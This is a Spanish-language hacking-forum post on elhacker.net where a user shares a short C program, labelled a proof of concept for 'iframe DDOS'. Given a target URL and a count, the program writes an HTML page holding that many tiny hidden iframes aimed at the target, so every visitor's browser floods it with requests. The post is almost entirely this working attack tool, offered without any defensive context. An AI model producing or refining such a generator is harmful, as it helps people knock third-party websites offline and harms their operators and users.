elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 00:42  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse)
| | |-+  [C] Iframe DDOS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [C] Iframe DDOS  (Leído 360 veces)
Doddy

Conectado Conectado

Mensajes: 220



Ver Perfil
[C] Iframe DDOS
« en: 8 Enero 2012, 18:38 »

Un simple POC para iframe DDOS

Código
 
/**
* Simple POC for IFRAME DDOS
* Coded By Doddy H
*/

 
#include <stdio.h>
 
void head() {
 printf("\n -- == IFRAME DDOS 0.1 == --\n\n");    
}
 
void end() {
 printf("\n\n -- == Coded By Doddy H == --\n");
}
 
int main ( int argc, char **argv ) {
 char *target;
 int i,count;
 FILE *archivo;
 
 head();
 if(argc != 3) {
   printf("\n[+] Sintax : ddos <target> <count>\n");
 } else {
   target = argv[1];
   count = atoi(argv[2]);
   printf("\n[+] Starting the party");
   archivo = fopen ("poc.html","a+");
   for(i=0;i<=count;i++) {                          
     fprintf(archivo,"%s","<iframe src='");
     fprintf(archivo,"%s",target);
     fprintf(archivo,"%s","' width='3' height='3'></iframe><br>\n");
   }
   fclose(archivo);    
   printf("\n[+] Finished\n");
 }    
 end();
 return 0;
}
 
/** The End ? */
 


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
iframe
Desarrollo Web
alexvem 7 2,648 Último mensaje 10 Enero 2009, 01:08
por Nakp
Posible ataque Ddos o Iframe ??
Seguridad
carla24 7 2,164 Último mensaje 8 Diciembre 2009, 20:05
por Azielito
iframe y div
Desarrollo Web
mecosecho 5 2,167 Último mensaje 8 Enero 2010, 17:08
por mecosecho
Ataque DDoS a WordPress : WordPress sufre el mayor ataque DDoS
Noticias
wolfbcn 0 1,176 Último mensaje 4 Marzo 2011, 13:17
por wolfbcn
[Perl] Iframe DDos Attack Tool
Scripting
Doddy 0 298 Último mensaje 7 Octubre 2011, 01:15
por Doddy
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines